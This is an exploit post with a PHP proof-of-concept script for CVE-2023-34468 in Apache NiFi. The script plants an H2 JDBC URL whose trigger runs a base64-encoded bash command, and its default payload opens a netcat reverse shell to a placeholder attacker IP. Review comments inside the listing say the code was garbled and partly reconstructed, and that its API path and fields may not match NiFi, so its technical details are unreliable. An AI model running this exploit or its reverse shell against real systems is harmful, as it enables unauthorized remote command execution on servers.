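=============================================================================================================================================
| # Title : Apache NiFi 1.17.0 RCE Vulnerability (CVE-2023-34468)
| # Author : indoushka
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)
| # Vendor : https://nifi.apache.org/
=============================================================================================================================================

POC :

[+] Dorking in Google or another search engine.

[+] Code Description: exploits the remote command execution vulnerability in Apache NiFi
    (Related: https://packetstorm.news/files/id/174398/ ; related CVE: CVE-2023-34468).
    Per the CVE record, the DBCPConnectionPool / HikariCPConnectionPool controller services in
    NiFi 0.0.2 through 1.21.0 let an *authenticated, authorized* user supply an H2 JDBC URL that
    executes custom code; Apache NiFi 1.22.0 is the fixed release. The request below therefore
    needs a bearer token for an account that is allowed to create controller services on the
    target -- this is post-authentication, not an unauthenticated RCE.

[+] Save the code as poc.php.

[+] Set Target: edit the $target and $token assignments at the bottom of the script.

[+] Payload:

<?php

declare(strict_types=1);

/**
 * PoC client for CVE-2023-34468: creates a NiFi database-connection controller
 * service whose H2 JDBC URL carries a CREATE TRIGGER with a JavaScript body that
 * runs an OS command through bash.
 *
 * NOTE(review): the class header and constructor signature were garbled in the
 * published listing (everything between "<?php" and the first "$this->" was lost);
 * they are reconstructed here from the visible `new ApacheNiFiExploit($target, $token)`
 * call and the `$this->target` / `$this->token` reads below.
 */
final class ApacheNiFiExploit
{
    /** Base URL of the NiFi instance, stored without a trailing slash. */
    private string $target;

    /** Bearer token for the NiFi REST API, or null when the API needs no auth. */
    private ?string $token;

    /**
     * Whether cURL verifies the server certificate. NiFi's default HTTPS listener
     * uses a self-signed certificate, so a request against such a target fails
     * unless this is set to false explicitly; the original script never set the
     * option, i.e. it relied on cURL's verifying default.
     */
    public bool $verifyTls = true;

    public function __construct(string $target, ?string $token = null)
    {
        $this->target = rtrim($target, '/');
        $this->token = $token;
    }

    /**
     * Send one JSON request to the NiFi REST API.
     *
     * @param string     $endpoint path relative to the target base URL (no leading slash)
     * @param string     $method   HTTP method passed as CURLOPT_CUSTOMREQUEST
     * @param array|null $data     body to JSON-encode, or null for a body-less request
     * @return array|null decoded JSON object, or null on transport failure / non-JSON reply
     */
    private function sendRequest(string $endpoint, string $method = 'GET', ?array $data = null): ?array
    {
        $headers = [];
        if ($this->token !== null && $this->token !== '') {
            $headers[] = "Authorization: Bearer {$this->token}";
        }

        $ch = curl_init("{$this->target}/{$endpoint}");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, $this->verifyTls);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, $this->verifyTls ? 2 : 0);

        if ($data !== null) {
            $headers[] = 'Content-Type: application/json';
            curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data, JSON_THROW_ON_ERROR));
        }
        // Set the header list exactly once; the original called CURLOPT_HTTPHEADER twice
        // and depended on the second call replacing the first.
        if ($headers !== []) {
            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        }

        $raw = curl_exec($ch);
        $err = curl_error($ch);
        $status = (int) curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
        curl_close($ch);

        if ($raw === false) {
            // The original passed false into json_decode() and reported a generic failure;
            // surface the transport error (DNS, TLS, refused) so it is not mistaken for a patched target.
            fwrite(STDERR, "[-] cURL error: {$err}\n");
            return null;
        }
        if ($status >= 400) {
            // 401/403 here means the token is missing, expired, or lacks the right to
            // create controller services -- the vulnerability is only reachable with that right.
            fwrite(STDERR, "[-] HTTP {$status} from {$endpoint}\n");
        }

        $decoded = json_decode($raw, true);
        return is_array($decoded) ? $decoded : null;
    }

    /**
     * Create a database-connection controller service whose H2 URL embeds a
     * JavaScript trigger that runs $payload through bash. The command is
     * base64-encoded and rebuilt with brace expansion ({echo,...}|{base64,-d})
     * so it survives Runtime.exec()'s whitespace tokenisation.
     *
     * NOTE(review): as published, this request only *creates* a service. Points a
     * practitioner should confirm against the referenced Packet Storm PoC before
     * trusting the success message: the body carries no component `type` and no
     * `revision`; the path does not match NiFi's documented create endpoints
     * (`controller/controller-services` or `process-groups/{id}/controller-services`);
     * the H2 setting after the first ';' is not prefixed with `INIT=`, so the driver
     * is not obviously told to run it as an init statement; and a BEFORE SELECT
     * trigger only fires after the service is enabled and a connection is opened.
     *
     * @param string $payload shell command to run on the NiFi host
     */
    public function exploit(string $payload): void
    {
        $b64_payload = base64_encode($payload);
        // Random names so repeated runs do not collide on the same file / trigger.
        $db_name = bin2hex(random_bytes(4));
        $trigger_name = strtoupper(bin2hex(random_bytes(4)));

        $db_config = [
            'component' => [
                'name' => 'ExploitDBPool',
                'properties' => [
                    'Database Connection URL' => "jdbc:h2:file:/tmp/$db_name.db;CREATE TRIGGER $trigger_name BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,$b64_payload}|{base64,-d}|{bash,-i}')\n$$--=x",
                    'Database Driver Class Name' => 'org.h2.Driver',
                ],
            ],
        ];

        $response = $this->sendRequest('nifi-api/controller-services', 'POST', $db_config);

        // A returned component id only proves the service object was created, not that
        // the trigger ran; the messages below are kept verbatim from the original.
        if (isset($response['component']['id'])) {
            // (Arabic) "Database connection service created and exploited successfully!"
            echo "[+] تم إنشاء واستغلال خدمة الاتصال بقاعدة البيانات بنجاح!";
        } else {
            // (Arabic) "Attack failed."
            echo "[-] فشل في تنفيذ الهجوم.";
        }
    }
}

// --- configuration: edit these two values for your authorised target -------------------
$target = 'https://target-nifi-instance.com';
$token = 'YOUR_BEARER_TOKEN'; // only needed if authentication is required

$exploit = new ApacheNiFiExploit($target, $token);
// $exploit->verifyTls = false; // uncomment only for a self-signed NiFi listener you control
$exploit->exploit('nc -e /bin/bash attacker-ip 4444');
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================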